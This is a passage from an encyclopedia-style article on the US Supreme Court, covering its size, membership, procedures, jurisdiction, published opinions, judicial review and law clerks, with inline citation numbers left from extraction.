Supreme Courts in the world, the US Supreme Court consists of nine members: one chief justice and eight associate justices. The U.S. Constitution does not specify the size of the Supreme Court, nor does it specify any specific positions for the court's members. The Constitution assumes the existence of the office of the chief justice, because it mentions in Article I, Section 3, Clause 6 that "the Chief Justice" must preside over impeachment trials of the President of the United States. The power to define the Supreme Court's size and membership has been assumed to belong to Congress, which initially established a six-member Supreme Court composed of a chief justice and five associate justices through the Judiciary Act of 1789. The size of the court was first altered by the Midnight Judges Act of 1801 which would have reduced the size of the court to five members upon its next vacancy (as federal judges have life tenure), but the Judiciary Act of 1802 promptly negated the 1801 act, restoring the court's size to six members before any such vacancy occurred. As the nation's boundaries grew across the continent and as Supreme Court justices in those days had to ride the circuit, an arduous process requiring long travel on horseback or carriage over harsh terrain that resulted in months-long extended stays away from home, Congress added justices to correspond with the growth such that the number of seats for associate justices plus the chief justice became seven in 1807, nine in 1837, and ten in 1863. 117 118 At the behest of Chief Justice Chase, and in an attempt by the Republican Congress to limit the power of Democrat Andrew Johnson, Congress passed the Judicial Circuits Act of 1866, providing that the next three justices to retire would not be replaced, which would thin the bench to seven justices by attrition. Consequently, one seat was removed in 1866 and a second in 1867. Soon after Johnson left office, the new president Ulysses S. Grant, 119 a Republican, signed into law the Judiciary Act of 1869. This returned the number of justices to nine 120 (where it has since remained), and allowed Grant to immediately appoint two more judges. President Franklin D. Roosevelt attempted to expand the court in 1937. His proposal envisioned the appointment of one additional justice for each incumbent justice who reached the age of 70 years 6 months and refused retirement, up to a maximum bench of 15 justices. The proposal was ostensibly to ease the burden of the docket on elderly judges, but the actual purpose was widely understood as an effort to "pack" the court with justices who would support Roosevelt's New Deal. 121 The plan, usually called the "court-packing plan", failed in Congress after members of Roosevelt's own Democratic Party believed it to be unconstitutional. It was defeated 70 20 in the Senate, and the Senate Judiciary Committee reported that it was "essential to the continuance of our constitutional democracy" that the proposal "be so emphatically rejected that its parallel will never again be presented to the free representatives of the free people of America. 122 123 124 125 The expansion of a 5 4 conservative majority to a 6 3 supermajority during the presidency of Donald Trump led to analysts calling the court the most conservative since the 1930s as well as calls for an expansion in the court's size to fix what some saw as an imbalance, with Republicans having appointed 14 of the 18 justices immediately preceding Amy Coney Barrett. 126 127 In April 2021, during the 117th Congress, some Democrats in the House of Representatives introduced the Judiciary Act of 2021, a bill to expand the Supreme Court from nine to 13 seats. It met divided views within the party, and Speaker of the House Nancy Pelosi did not bring it to the floor for a vote. 128 129 Shortly after taking office in January 2021, President Joe Biden established a presidential commission to study possible reforms to the Supreme Court. The commission's December 2021 final report discussed but took no position on expanding the size of the court. 130 At nine members, the U.S. Supreme Court is one of the smallest supreme courts in the world. David Litt argues the court is too small to represent the perspectives of a country the United States' size. 131 Lawyer and legal scholar Jonathan Turley advocates for 19 justices, with the court being gradually expanded by two new members per presidential term, bringing the U.S. Supreme Court to a similar size as its counterparts in other developed countries. He says that a bigger court would reduce the power of the swing justice, ensure the court has "a greater diversity of views", and make confirmation of new justices less politically contentious. 132 133 There are currently nine justices on the Supreme Court: Chief Justice John Roberts and eight associate justices. Among the current members of the court, Clarence Thomas is the longest-serving justice, with a tenure of 11,987 days (32 years, 299 days) as of August 17, 2024; the most recent justice to join the court is Ketanji Brown Jackson, whose tenure began on June 30, 2022, after being confirmed by the Senate on April 7. 134 This graphical timeline depicts the length of each current Supreme Court justice's tenure (not seniority, as the chief justice has seniority over all associate justices regardless of tenure) on the court: The court currently has five male and four female justices. Among the nine justices, there are two African American justices (Justices Thomas and Jackson) and one Hispanic justice (Justice Sotomayor). One of the justices was born to at least one immigrant parent: Justice Alito's father was born in Italy. 136 137 At least six justices are Roman Catholics, one is Jewish, and one is Protestant. It is unclear whether Neil Gorsuch considers himself a Catholic or an Episcopalian. 138 Historically, most justices have been Protestants, including 36 Episcopalians, 19 Presbyterians, 10 Unitarians, 5 Methodists, and 3 Baptists. 139 140 The first Catholic justice was Roger Taney in 1836, 141 and 1916 saw the appointment of the first Jewish justice, Louis Brandeis. 142 In recent years the historical situation has reversed, as most recent justices have been either Catholic or Jewish. Three justices are from the state of New York, two are from Washington, D.C., and one each is from New Jersey, Georgia, Colorado, and Louisiana. 143 144 145 Eight of the current justices received their Juris Doctor from an Ivy League law school: Neil Gorsuch, Ketanji Brown Jackson, Elena Kagan and John Roberts from Harvard; plus Samuel Alito, Brett Kavanaugh, Sonia Sotomayor and Clarence Thomas from Yale. Only Amy Coney Barrett did not; she received her Juris Doctor at Notre Dame. Previous positions or offices, judicial or federal government, prior to joining the court (by order of seniority following the Chief Justice) include: For much of the court's history, every justice was a man of Northwestern European descent, and almost always Protestant. Diversity concerns focused on geography, to represent all regions of the country, rather than religious, ethnic, or gender diversity. 146 Racial, ethnic, and gender diversity in the court increased in the late 20th century. Thurgood Marshall became the first African-American justice in 1967. 142 Sandra Day O'Connor became the first female justice in 1981. 142 In 1986, Antonin Scalia became the first Italian-American justice. Marshall was succeeded by African-American Clarence Thomas in 1991. 147 O'Connor was joined by Ruth Bader Ginsburg, the first Jewish woman on the Court, in 1993. 148 After O'Connor's retirement Ginsburg was joined in 2009 by Sonia Sotomayor, the first Hispanic and Latina justice, 142 and in 2010 by Elena Kagan. 148 After Ginsburg's death on September 18, 2020, Amy Coney Barrett was confirmed as the fifth woman in the court's history on October 26, 2020. Ketanji Brown Jackson is the sixth woman and first African-American woman on the court. There have been six foreign-born justices in the court's history: James Wilson (1789 1798), born in Caskardy, Scotland; James Iredell (1790 1799), born in Lewes, England; William Paterson (1793 1806), born in County Antrim, Ireland; David Brewer (1889 1910), born to American missionaries in Smyrna, Ottoman Empire (now zmir, Turkey); George Sutherland (1922 1939), born in Buckinghamshire, England; and Felix Frankfurter (1939 1962), born in Vienna, Austria-Hungary (now in Austria). 142 Since 1789, about one-third of the justices have been U.S. military veterans. Samuel Alito is the only veteran currently serving on the court. 149 Retired justices Stephen Breyer and Anthony Kennedy also served in the U.S. military. 150 Justices are nominated by the president in power, and receive confirmation by the Senate, historically holding many of the views of the nominating president's political party. While justices do not represent or receive official endorsements from political parties, as is accepted practice in the legislative and executive branches, organizations such as the Federalist Society do officially filter and endorse judges that have a sufficiently conservative view of the law. Jurists are often informally categorized in the media as being conservatives or liberal. Attempts to quantify the ideologies of jurists include the Segal Cover score, Martin-Quinn score, and Judicial Common Space score. 151 152 Devins and Baum argue that before 2010, the Court never had clear ideological blocs that fell perfectly along party lines. In choosing their appointments, Presidents often focused more on friendship and political connections than on ideology. Republican presidents sometimes appointed liberals and Democratic presidents sometimes appointed conservatives. As a result, ... between 1790 and early 2010 there were only two decisions that the Guide to the U.S. Supreme Court designated as important and that had at least two dissenting votes in which the Justices divided along party lines, about one-half of one percent. 153 : 316 154 Even in the turbulent 1960s and 1970s, Democratic and Republican elites tended to agree on some major issues, especially concerning civil rights and civil liberties—and so did the justices. But since 1991, they argue, ideology has been much more important in choosing justices—all Republican appointees have been committed conservatives and all Democratic appointees have been liberals. 153 : 331 344 As the more moderate Republican justices retired, the court has become more partisan. The Court became more divided sharply along partisan lines with justices appointed by Republican presidents taking increasingly conservative positions and those appointed by Democrats taking moderate liberal positions. 153 : 357 Following the confirmation of Amy Coney Barrett in 2020 after the death of Ruth Bader Ginsburg, the court is composed of six justices appointed by Republican presidents and three appointed by Democratic presidents. It is popularly accepted that Chief Justice Roberts and associate justices Thomas, Alito, Gorsuch, Kavanaugh, and Barrett, appointed by Republican presidents, compose the court's conservative wing, and that Justices Sotomayor, Kagan, and Jackson, appointed by Democratic presidents, compose the court's liberal wing. 155 Prior to Justice Ginsburg's death in 2020, the conservative Chief Justice Roberts was sometimes described as the court's 'median justice' (with four justices more liberal and four more conservative than he is). 156 157 Darragh Roche argues that Kavanaugh as 2021's median justice exemplifies the rightward shift in the court. 158 needs update FiveThirtyEight found the number of unanimous decisions dropped from the 20 year average of nearly 50% to nearly 30% in 2021 while party-line rulings increased from a 60 year average just above zero to a record high 21%. 159 That year Ryan Williams pointed to the party-line votes for confirmations of justices as evidence that the court is of partisan importance to the Senate. 160 In 2022, Simon Lazarus of Brookings critiqued the U.S. Supreme Court as an increasingly partisan institution. 161 A 2024 AP-NORC poll showed 7 in 10 respondents believed the court decides cases to "fit their own ideologies" as opposed to "acting as an independent check on other branches of government by being fair and impartial. 162 There are currently three living retired justices of the Supreme Court of the United States: Anthony Kennedy, David Souter, and Stephen Breyer. As retired justices, they no longer participate in the work of the Supreme Court, but may be designated for temporary assignments to sit on lower federal courts, usually the United States Courts of Appeals. Such assignments are formally made by the chief justice, on request of the chief judge of the lower court and with the consent of the retired justice. In recent years, Justice Souter has frequently sat on the First Circuit, the court of which he was briefly a member before joining the Supreme Court. 163 The status of a retired justice is analogous to that of a circuit or district court judge who has taken senior status, and eligibility of a Supreme Court justice to assume retired status (rather than simply resign from the bench) is governed by the same age and service criteria. In recent times, justices tend to strategically plan their decisions to leave the bench with personal, institutional, ideological, partisan, and political factors playing a role. 164 165 The fear of mental decline and death often motivates justices to step down. The desire to maximize the court's strength and legitimacy through one retirement at a time, when the court is in recess and during non-presidential election years suggests a concern for institutional health. Finally, especially in recent decades, many justices have timed their departure to coincide with a philosophically compatible president holding office, to ensure that a like-minded successor would be appointed. 166 167 As of 2024, associate justices receive a yearly salary of $298,500 and the chief justice is paid $312,200 per year. 168 Once a justice meets age and service requirements, the justice may retire with a pension based on the same formula used for federal employees. As with other federal courts judges, their pension can never be less than their salary at the time of retirement according to the Compensation Clause of Article III of the Constitution. citation needed For the most part, the day-to-day activities of the justices are governed by rules of protocol based upon the seniority of justices. The chief justice always ranks first in the order of precedence—regardless of the length of their service. The associate justices are then ranked by the length of their service. The chief justice sits in the center on the bench, or at the head of the table during conferences. The other justices are seated in order of seniority. The senior-most associate justice sits immediately to the chief justice's right; the second most senior sits immediately to their left. The seats alternate right to left in order of seniority, with the most junior justice occupying the last seat. Therefore, since the October 2022 term, the court sits as follows from left to right, from the perspective of those facing the court: Barrett, Gorsuch, Sotomayor, Thomas (most senior associate justice), Roberts (chief justice), Alito, Kagan, Kavanaugh, and Jackson. Likewise, when the members of the court gather for official group photographs, justices are arranged in order of seniority, with the five most senior members seated in the front row in the same order as they would sit during Court sessions (currently, from left to right, Sotomayor, Thomas, Roberts, Alito, and Kagan), and the four most junior justices standing behind them, again in the same order as they would sit during Court sessions (Barrett, Gorsuch, Kavanaugh, and Jackson). In the justices' private conferences, current practice is for them to speak and vote in order of seniority, beginning with the chief justice first and ending with the most junior associate justice. By custom, the most junior associate justice in these conferences is charged with any menial tasks the justices may require as they convene alone, such as answering the door of their conference room, serving beverages and transmitting orders of the court to the clerk. 169 The Supreme Court first met on February 1, 1790, at the Merchants' Exchange Building in New York City. When Philadelphia became the capital, the court met briefly in Independence Hall before settling in Old City Hall from 1791 until 1800. After the government moved to Washington, D.C., the court occupied various spaces in the Capitol building until 1935, when it moved into its own purpose-built home. The four-story building was designed by Cass Gilbert in a classical style sympathetic to the surrounding buildings of the Capitol and Library of Congress, and is clad in marble. The building includes the courtroom, justices' chambers, an extensive law library, various meeting spaces, and auxiliary services including a gymnasium. The Supreme Court building is within the ambit of the Architect of the Capitol, but maintains its own Supreme Court Police, separate from the Capitol Police. 170 Located across First Street from the United States Capitol at One First Street NE and Maryland Avenue, 171 172 the building is open to the public from 9 am to 4:30 pm weekdays but closed on weekends and holidays. 171 Visitors may not tour the actual courtroom unaccompanied. There is a cafeteria, a gift shop, exhibits, and a half-hour informational film. 170 When the court is not in session, lectures about the courtroom are held hourly from 9:30 am to 3:30 pm and reservations are not necessary. 170 When the court is in session the public may attend oral arguments, which are held twice each morning (and sometimes afternoons) on Mondays, Tuesdays, and Wednesdays in two-week intervals from October through late April, with breaks during December and February. Visitors are seated on a first-come first-served basis. One estimate is there are about 250 seats available. 173 The number of open seats varies from case to case; for important cases, some visitors arrive the day before and wait through the night. The court releases opinions beginning at 10 am on scheduled "non-argument days" (also called opinion days) 174 These sessions, which typically last 15 to 30 minute, are also open to the public. 174 170 From mid-May until the end of June, at least one opinion day is scheduled each week. 170 Supreme Court Police are available to answer questions. 171 Congress is authorized by Article III of the federal Constitution to regulate the Supreme Court's appellate jurisdiction. The Supreme Court has original and exclusive jurisdiction over cases between two or more states 175 but may decline to hear such cases. 176 It also possesses original but not exclusive jurisdiction to hear "all actions or proceedings to which ambassadors, other public ministers, consuls, or vice consuls of foreign states are parties; all controversies between the United States and a State; and all actions or proceedings by a State against the citizens of another State or against aliens. 177 In 1906, the court asserted its original jurisdiction to prosecute individuals for contempt of court in United States v. Shipp. 178 The resulting proceeding remains the only contempt proceeding and only criminal trial in the court's history. 179 180 The contempt proceeding arose from the lynching of Ed Johnson in Chattanooga, Tennessee the evening after Justice John Marshall Harlan granted Johnson a stay of execution to allow his lawyers to file an appeal. Johnson was removed from his jail cell by a lynch mob, aided by the local sheriff who left the prison virtually unguarded, and hanged from a bridge, after which a deputy sheriff pinned a note on Johnson's body reading: "To Justice Harlan. Come get your nigger now. 179 The local sheriff, John Shipp, cited the Supreme Court's intervention as the rationale for the lynching. The court appointed its deputy clerk as special master to preside over the trial in Chattanooga with closing arguments made in Washington before the Supreme Court justices, who found nine individuals guilty of contempt, sentencing three to 90 days in jail and the rest to 60 days in jail. 179 180 181 In all other cases, the court has only appellate jurisdiction, including the ability to issue writs of mandamus and writs of prohibition to lower courts. It considers cases based on its original jurisdiction very rarely; almost all cases are brought to the Supreme Court on appeal. In practice, the only original jurisdiction cases heard by the court are disputes between two or more states. 182 The court's appellate jurisdiction consists of appeals from federal courts of appeal (through certiorari, certiorari before judgment, and certified questions), 183 the United States Court of Appeals for the Armed Forces (through certiorari), 184 the Supreme Court of Puerto Rico (through certiorari), 185 the Supreme Court of the Virgin Islands (through certiorari), 186 the District of Columbia Court of Appeals (through certiorari), 187 and "final judgments or decrees rendered by the highest court of a State in which a decision could be had" (through certiorari). 187 In the last case, an appeal may be made to the Supreme Court from a lower state court if the state's highest court declined to hear an appeal or lacks jurisdiction to hear an appeal. For example, a decision rendered by one of the Florida District Courts of Appeal can be appealed to the U.S. Supreme Court if (a) the Supreme Court of Florida declined to grant certiorari, e.g. Florida Star v. B. J. F., or (b) the district court of appeal issued a per curiam decision simply affirming the lower court's decision without discussing the merits of the case, since the Supreme Court of Florida lacks jurisdiction to hear appeals of such decisions. 188 The power of the Supreme Court to consider appeals from state courts, rather than just federal courts, was created by the Judiciary Act of 1789 and upheld early in the court's history, by its rulings in Martin v. Hunter's Lessee (1816) and Cohens v. Virginia (1821). The Supreme Court is the only federal court that has jurisdiction over direct appeals from state court decisions, although there are several devices that permit so-called "collateral review" of state cases. It has to be noted that this "collateral review" often only applies to individuals on death row and not through the regular judicial system. 189 Since Article Three of the United States Constitution stipulates that federal courts may only entertain "cases" or "controversies", the Supreme Court cannot decide cases that are moot and it does not render advisory opinions, as the supreme courts of some states may do. For example, in DeFunis v. Odegaard (1974), the court dismissed a lawsuit challenging the constitutionality of a law school affirmative action policy because the plaintiff student had graduated since he began the lawsuit, and a decision from the court on his claim would not be able to redress any injury he had suffered. However, the court recognizes some circumstances where it is appropriate to hear a case that is seemingly moot. If an issue is "capable of repetition yet evading review", the court would address it even though the party before the court would not themselves be made whole by a favorable result. In Roe v. Wade (1973), and other abortion cases, the court addresses the merits of claims pressed by pregnant women seeking abortions even if they are no longer pregnant because it takes longer than the typical human gestation period to appeal a case through the lower courts to the Supreme Court. Another mootness exception is voluntary cessation of unlawful conduct, in which the court considers the probability of recurrence and plaintiff's need for relief. 190 The United States is divided into thirteen circuit courts of appeals, each of which is assigned a "circuit justice" from the Supreme Court. Although this concept has been in continuous existence throughout the history of the republic, its meaning has changed through time. Under the Judiciary Act of 1789, each justice was required to "ride circuit", or to travel within the assigned circuit and consider cases alongside local judges. This practice encountered opposition from many justices, who cited the difficulty of travel. Moreover, there was a potential for a conflict of interest on the court if a justice had previously decided the same case while riding circuit. Circuit riding ended in 1901, when the Circuit Court of Appeals Act was passed, and circuit riding was officially abolished by Congress in 1911. 191 The circuit justice for each circuit is responsible for dealing with certain types of applications that, by law and the rules of the court, may be addressed by a single justice. Ordinarily, a justice will resolve such an application by simply endorsing it "granted" or "denied" or entering a standard form of order; however, the justice may elect to write an opinion, referred to as an in-chambers opinion. Congress has specifically authorized one justice to issue a stay pending certiorari in 28 U.S.C. 2101(f) inappropriate external link? . Each justice also decides routine procedural requests, such as for extensions of time. Before 1990, the rules of the Supreme Court also stated that "a writ of injunction may be granted by any Justice in a case where it might be granted by the Court. 192 However, this part of the rule (and all other specific mention of injunctions) was removed in the Supreme Court's rules revision of December 1989. 193 194 Nevertheless, requests for injunctions under the All Writs Act are sometimes directed to the circuit justice. In the past, when? circuit justices also sometimes granted motions for bail in criminal cases, writs of habeas corpus, and applications for writs of error granting permission to appeal. 195 A circuit justice may sit as a judge on the Court of Appeals of that circuit, but over the past hundred years, this has rarely occurred. A circuit justice sitting with the Court of Appeals has seniority over the chief judge of the circuit. 196 The chief justice has traditionally been assigned to the District of Columbia Circuit, the Fourth Circuit (which includes Maryland and Virginia, the states surrounding the District of Columbia), and since it was established, the Federal Circuit. Each associate justice is assigned to one or two judicial circuits. As of September 28, 2022, the allotment of the justices among the circuits is as follows: 197 Five of the current justices are assigned to circuits on which they previously sat as circuit judges: Chief Justice Roberts (D.C. Circuit), Justice Sotomayor (Second Circuit), Justice Alito (Third Circuit), Justice Barrett (Seventh Circuit), and Justice Gorsuch (Tenth Circuit). Nearly all cases come before the court by way of petitions for writs of certiorari, commonly referred to as cert, upon which the court grants a writ of certiorari. The court may review via this process any civil or criminal case in the federal courts of appeals. 198 It may also review by certiorari a final judgment of the highest court of a state if the judgment involves a question of federal statutory or constitutional law. 199 A case may alternatively come before the court as a direct appeal from a three-judge federal district court. 200 The party that petitions the court for review is the petitioner and the non-mover is the respondent. Case names before the court are styled petitioner v. respondent, regardless of which party initiated the lawsuit in the trial court. For example, criminal prosecutions are brought in the name of the state and against an individual, as in State of Arizona v. Ernesto Miranda. If the defendant is convicted, and his conviction then is affirmed on appeal in the state supreme court, when he petitions for cert the name of the case becomes Miranda v. Arizona. The court also hears questions submitted to it by appeals courts themselves via a process known as certification. 198 The Supreme Court relies on the record assembled by lower courts for the facts of a case and deals solely with the question of how the law applies to the facts presented. There are however situations where the court has original jurisdiction, such as when two states have a dispute against each other, or when there is a dispute between the United States and a state. In such instances, a case is filed with the Supreme Court directly. Examples of such cases include United States v. Texas, a case to determine whether a parcel of land belonged to the United States or to Texas, and Virginia v. Tennessee, a case turning on whether an incorrectly drawn boundary between two states can be changed by a state court, and whether the setting of the correct boundary requires Congressional approval. Although it has not happened since 1794 in the case of Georgia v. Brailsford, 201 parties in an action at law in which the Supreme Court has original jurisdiction may request that a jury determine issues of fact. 202 Georgia v. Brailsford remains the only case in which the court has empaneled a jury, in this case a special jury. 203 Two other original jurisdiction cases involve colonial era borders and rights under navigable waters in New Jersey v. Delaware, and water rights between riparian states upstream of navigable waters in Kansas v. Colorado. A cert petition is voted on at a session of the court called conference. A conference is a private meeting of the nine justices by themselves; the public and the justices' clerks are excluded. The rule of four permits four of the nine justices to grant a writ of certiorari. If it is granted, the case proceeds to the briefing stage; otherwise, the case ends. Except in death penalty cases and other cases in which the court orders briefing from the respondent, the respondent may, but is not required to, file a response to the cert petition. The court grants a petition for cert only for "compelling reasons", spelled out in the court's Rule 10. Such reasons include: When a conflict of interpretations arises from differing interpretations of the same law or constitutional provision issued by different federal circuit courts of appeals, lawyers call this situation a "circuit split"; if the court votes to deny a cert petition, as it does in the vast majority of such petitions that come before it, it does so typically without comment. A denial of a cert petition is not a judgment on the merits of a case, and the decision of the lower court stands as the case's final ruling. To manage the high volume of cert petitions received by the court each year (of the more than 7,000 petitions the court receives each year, it will usually request briefing and hear oral argument in 100 or fewer), the court employs an internal case management tool known as the "cert pool"; currently, all justices except for Justices Alito and Gorsuch participate in the cert pool. 204 205 206 207 The Court also relies on and cites amicus briefs, law review articles, and other written works for their decisions. While law review article use has increased slightly with one article cited per decision on average, 208 the use of amicus briefs has increased significantly. 209 The use of amicus briefs has received criticism, including the ability of authors to discuss topics outside their expertise (unlike in lower courts), 209 with documented examples of falsehoods in written opinions, often supplied to the justices by amicus briefs from groups advocating a particular outcome. 210 The lack of funding transparency and the lack of a requirement to submit them earlier in the process also make it more difficult to fact-check and understand the credibility of amicus briefs. 209 When the court grants a cert petition, the case is set for oral argument. Both parties will file briefs on the merits of the case, as distinct from the reasons they may have argued for granting or denying the cert petition. With the consent of the parties or approval of the court, amici curiae, or "friends of the court", may also file briefs. The court holds two-week oral argument sessions each month from October through April. Each side has thirty minutes to present its argument (the court may choose to give more time, although this is rare), 211 and during that time, the justices may interrupt the advocate and ask questions. In 2019, the court adopted a rule generally allowing advocates to speak uninterrupted for the first two minutes of their argument. 212 The petitioner gives the first presentation, and may reserve some time to rebut the respondent's arguments after the respondent has concluded. Amici curiae may also present oral argument on behalf of one party if that party agrees. The court advises counsel to assume that the justices are familiar with and have read the briefs filed in a case. At the conclusion of oral argument, the case is submitted for decision. Cases are decided by majority vote of the justices. After the oral argument is concluded, usually in the same week as the case was submitted, the justices retire to another conference at which the preliminary votes are tallied and the court sees which side has prevailed. One of the justices in the majority is then assigned to write the court's opinion, also known as the "majority opinion", an assignment made by the most senior justice in the majority, with the chief justice always being considered the most senior. Drafts of the court's opinion circulate among the justices until the court is prepared to announce the judgment in a particular case. 213 Justices are free to change their votes on a case up until the decision is finalized and published. In any given case, a justice is free to choose whether or not to author an opinion or else simply join the majority or another justice's opinion. There are several primary types of opinions: It is the court's practice to issue decisions in all cases argued in a particular term by the end of that term. Within that term, the court is under no obligation to release a decision within any set time after oral argument. Since recording devices are banned inside the courtroom of the Supreme Court Building, the delivery of the decision to the media has historically been done via paper copies in what was known as the "Running of the Interns". 214 However, this practice has become pass as the Court now posts electronic copies of the opinions on its website as they are being announced. 215 It is possible that through recusals or vacancies the court divides evenly on a case. If that occurs, then the decision of the court below is affirmed, but does not establish binding precedent. In effect, it results in a return to the status quo ante. For a case to be heard, there must be a quorum of at least six justices. 216 If a quorum is not available to hear a case and a majority of qualified justices believes that the case cannot be heard and determined in the next term, then the judgment of the court below is affirmed as if the court had been evenly divided. For cases brought to the Supreme Court by direct appeal from a United States District Court, the chief justice may order the case remanded to the appropriate U.S. Court of Appeals for a final decision there. 217 This has only occurred once in U.S. history, in the case of United States v. Alcoa (1945). 218 The court's opinions are published in three stages. First, a slip opinion is made available on the court's web site and through other outlets. Next, several opinions and lists of the court's orders are bound together in paperback form, called a preliminary print of United States Reports, the official series of books in which the final version of the court's opinions appears. About a year after the preliminary prints are issued, a final bound volume of U.S. Reports is issued by the Reporter of Decisions. The individual volumes of U.S. Reports are numbered so that users may cite this set of reports (or a competing version published by another commercial legal publisher but containing parallel citations) to allow those who read their pleadings and other briefs to find the cases quickly and easily. As of January 2019 update , there are: As of March 2012 update , the U.S. Reports have published a total of 30,161 Supreme Court opinions, covering the decisions handed down from February 1790 to March 2012. citation needed This figure does not reflect the number of cases the court has taken up, as several cases can be addressed by a single opinion (see, for example, Parents v. Seattle, where Meredith v. Jefferson County Board of Education was also decided in the same opinion; by a similar logic, Miranda v. Arizona actually decided not only Miranda but also three other cases: Vignera v. New York, Westover v. United States, and California v. Stewart). A more unusual example is The Telephone Cases, which are a single set of interlinked opinions that take up the entire 126th volume of the U.S. Reports. Opinions are also collected and published in two unofficial, parallel reporters: Supreme Court Reporter, published by West (now a part of Thomson Reuters), and United States Supreme Court Reports, Lawyers' Edition (simply known as Lawyers' Edition), published by LexisNexis. In court documents, legal periodicals and other legal media, case citations generally contain cites from each of the three reporters; for example, citation to Citizens United v. Federal Election Commission is presented as Citizens United v. Federal Election Com'n, 585 U.S. 50, 130 S. Ct. 876, 175 L. Ed. 2d 753 (2010), with "S. Ct. representing the Supreme Court Reporter, and "L. Ed. representing the Lawyers' Edition. 222 223 Lawyers use an abbreviated format to cite cases, in the form "vol U.S. page, pin (year) , where vol is the volume number, page is the page number on which the opinion begins, and year is the year in which the case was decided. Optionally, pin is used to "pinpoint" to a specific page number within the opinion. For instance, the citation for Roe v. Wade is 410 U.S. 113 (1973), which means the case was decided in 1973 and appears on page 113 of volume 410 of U.S. Reports. For opinions or orders that have not yet been published in the preliminary print, the volume and page numbers may be replaced with In order to plead before the court, an attorney must first be admitted to the court's bar. Approximately 4,000 lawyers join the bar each year. The bar contains an estimated 230,000 members. In reality, pleading is limited to several hundred attorneys. citation needed The rest join for a one-time fee of $200, with the court collecting about $750,000 annually. Attorneys can be admitted as either individuals or as groups. The group admission is held before the current justices of the Supreme Court, wherein the chief justice approves a motion to admit the new attorneys. 224 Lawyers commonly apply for the cosmetic value of a certificate to display in their office or on their resume. They also receive access to better seating if they wish to attend an oral argument. 225 Members of the Supreme Court Bar are also granted access to the collections of the Supreme Court Library. 226 A term of the Supreme Court commences on the first Monday of each October, and continues until June or early July of the following year. Each term consists of alternating periods of around two weeks known as "sittings" and "recesses"; justices hear cases and deliver rulings during sittings, and discuss cases and write opinions during recesses. 227 The federal court system and the judicial authority to interpret the Constitution received little attention in the debates over the drafting and ratification of the Constitution. The power of judicial review, in fact, is nowhere mentioned in it. Over the ensuing years, the question of whether the power of judicial review was even intended by the drafters of the Constitution was quickly frustrated by the lack of evidence bearing on the question either way. 228 Nevertheless, the power of judiciary to overturn laws and executive actions it determines are unlawful or unconstitutional is a well-established precedent. Many of the Founding Fathers accepted the notion of judicial review; in Federalist No. 78, Alexander Hamilton wrote: "A Constitution is, in fact, and must be regarded by the judges, as a fundamental law. It therefore belongs to them to ascertain its meaning, and the meaning of any particular act proceeding from the legislative body. If there should happen to be an irreconcilable variance between the two, that which has the superior obligation and validity ought, of course, to be preferred; or, in other words, the Constitution ought to be preferred to the statute. The Supreme Court established its own power to declare laws unconstitutional in Marbury v. Madison (1803), consummating the American system of checks and balances. In explaining the power of judicial review, Chief Justice John Marshall stated that the authority to interpret the law was the particular province of the courts, part of the duty of the judicial department to say what the law is. His contention was not that the court had privileged insight into constitutional requirements, but that it was the constitutional duty of the judiciary, as well as the other branches of government, to read and obey the dictates of the Constitution. 228 This decision was criticized by then-President Thomas Jefferson who said, "the Constitution, on this hypothesis, is a mere thing of wax in the hands of the judiciary, which they may twist and shape into any form they please. 229 Since the founding of the republic, there has been a tension between the practice of judicial review and the democratic ideals of egalitarianism, self-government, self-determination and freedom of conscience. At one pole are those who view the federal judiciary and especially the Supreme Court as being "the most separated and least checked of all branches of government. 230 Indeed, federal judges and justices on the Supreme Court are not required to stand for election by virtue of their tenure "during good behavior", and their pay may "not be diminished" while they hold their position (Section 1 of Article Three). Although subject to the process of impeachment, only one justice has ever been impeached and no Supreme Court justice has been removed from office. At the other pole are those who view the judiciary as the least dangerous branch, with little ability to resist the exhortations of the other branches of government. 228 The Supreme Court cannot directly enforce its rulings; instead, it relies on respect for the Constitution and for the law for adherence to its judgments. One notable instance of nonacquiescence came in 1832, when the state of Georgia ignored the Supreme Court's decision in Worcester v. Georgia. President Andrew Jackson, who sided with the Georgia courts, is supposed to have remarked, "John Marshall has made his decision; now let him enforce it 231 Some state governments in the South also resisted the desegregation of public schools after the 1954 judgment Brown v. Board of Education. More recently, many feared that President Nixon would refuse to comply with the court's order in United States v. Nixon (1974) to surrender the Watergate tapes. 232 Nixon ultimately complied with the Supreme Court's ruling. 233 Supreme Court decisions can be purposefully overturned by constitutional amendment, something that has happened on six occasions: 234 When the court rules on matters involving the interpretation of laws rather than of the Constitution, simple legislative action can reverse the decisions (for example, in 2009 Congress passed the Lilly Ledbetter Fair Pay Act of 2009, superseding the limitations given in Ledbetter v. Goodyear Tire Rubber Co. in 2007). Also, the Supreme Court is not immune from political and institutional consideration: lower federal courts and state courts sometimes resist doctrinal innovations, as do law enforcement officials. 235 In addition, the other two branches can restrain the court through other mechanisms. Congress can increase the number of justices, giving the president power to influence future decisions by appointments (as in Roosevelt's court-packing plan discussed above). Congress can pass legislation that restricts the jurisdiction of the Supreme Court and other federal courts over certain topics and cases: this is suggested by language in Section 2 of Article Three, where the appellate jurisdiction is granted "with such Exceptions, and under such Regulations as the Congress shall make. The court sanctioned such congressional action in the Reconstruction Era case ex parte McCardle (1869), although it rejected Congress' power to dictate how particular cases must be decided in United States v. Klein (1871). 236 On the other hand, tone through its power of judicial review, the Supreme Court has defined the scope and nature of the powers and separation between the legislative and executive branches of the federal government; for example, in United States v. Curtiss-Wright Export Corp. (1936), Dames Moore v. Regan (1981), and notably in Goldwater v. Carter (1979), which effectively gave the presidency the power to terminate ratified treaties without the consent of Congress. The court's decisions can also impose limitations on the scope of Executive authority, as in Humphrey's Executor v. United States (1935), the Steel Seizure Case (1952), and United States v. Nixon (1974). citation needed Each Supreme Court justice hires several law clerks to review petitions for writ of certiorari, research them, prepare bench memorandums, and draft opinions. Associate justices are allowed four clerks. The chief justice is allowed five clerks, but Chief Justice Rehnquist hired only three per year, and Chief Justice Roberts usually hires only four. 237 Generally, law clerks serve a term of one to two years. The first law clerk was hired by Associate Justice Horace Gray in 1882. 237 238 Oliver Wendell Holmes Jr. and Louis Brandeis were the first Supreme Court justices to use recent law school graduates as clerks, rather than hiring "a stenographer-secretary. 239 Most law clerks are recent law school graduates. The first female clerk was Lucile Lomen, hired in 1944 by Justice William O. Douglas. 237 The first African-American, William T. Coleman Jr., was hired in 1948 by Justice Felix Frankfurter. 237 A disproportionately large number of law clerks have obtained law degrees from elite law schools, especially Harvard, Yale, the University of Chicago, Columbia, and Stanford. From 1882 to 1940, 62% of law clerks were graduates of Harvard Law School. 237 Those chosen to be Supreme Court law clerks usually have graduated in the top of their law school class and were often an editor of the law review or a member of the moot court board. By the mid 1970s, clerking previously for a judge in a federal court of 